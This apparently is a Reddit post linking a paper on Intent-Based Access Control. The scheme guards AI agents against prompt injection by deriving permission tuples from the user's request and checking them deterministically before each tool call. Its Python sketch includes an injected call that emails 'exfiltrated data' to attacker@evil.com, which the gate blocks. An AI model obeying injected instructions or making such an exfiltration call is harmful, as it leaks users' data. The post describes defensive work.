Intent-Based Access Control (IBAC) – FGA for AI Agent Permissions

Every production defense against prompt injection (input filters, LLM-as-a-judge, output classifiers) tries to make the AI smarter about detecting attacks. Intent-Based Access Control (IBAC) makes attacks irrelevant. IBAC derives per-request permissions from the user's explicit intent, enforces them deterministically at every tool invocation, and blocks unauthorized actions regardless of how thoroughly injected instructions compromise the LLM's reasoning.

The implementation takes two steps: parse the user's intent into FGA tuples (e.g., email:send#bob@company.com), then check those tuples before every tool call. One extra LLM call. One ~9ms authorization check. No custom interpreter, no dual-LLM architecture, no changes to your agent framework.
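A minimal sketch of those two steps, assuming a hypothetical agent setup (the function and class names here are illustrative, not the paper's actual API; the intent parser is stubbed out where the extra LLM call would go):

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class FgaTuple:
    """FGA-style permission tuple: resource, action, object."""
    resource: str
    action: str
    obj: str

def parse_intent(user_request: str) -> set[FgaTuple]:
    """Stand-in for the extra LLM call that maps the user's request
    to permission tuples. Hard-coded here for illustration."""
    # "Email Bob the Q3 report" -> may send email to bob@company.com
    return {FgaTuple("email", "send", "bob@company.com")}

class ToolGate:
    """Deterministic check run before every tool invocation.
    Injected instructions cannot widen this set mid-conversation."""
    def __init__(self, allowed: set[FgaTuple]):
        self.allowed = allowed

    def check(self, resource: str, action: str, obj: str) -> bool:
        return FgaTuple(resource, action, obj) in self.allowed

gate = ToolGate(parse_intent("Email Bob the Q3 report"))

def send_email(to: str, body: str) -> str:
    # Authorization is enforced at the tool boundary, not in the prompt.
    if not gate.check("email", "send", to):
        raise PermissionError(f"blocked: email:send#{to} not in user intent")
    return f"sent to {to}"

print(send_email("bob@company.com", "Q3 report attached"))  # allowed
try:
    send_email("attacker@evil.com", "exfiltrated data")     # injected action
except PermissionError as e:
    print(e)  # blocked: email:send#attacker@evil.com not in user intent
```

The key property is that the check is a set-membership test, not another model judgment: even a fully compromised LLM can only request tool calls, and any call outside the derived tuples fails closed.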

https://ibac.dev/ibac-paper.pdf

submitted by /u/ok_bye_now_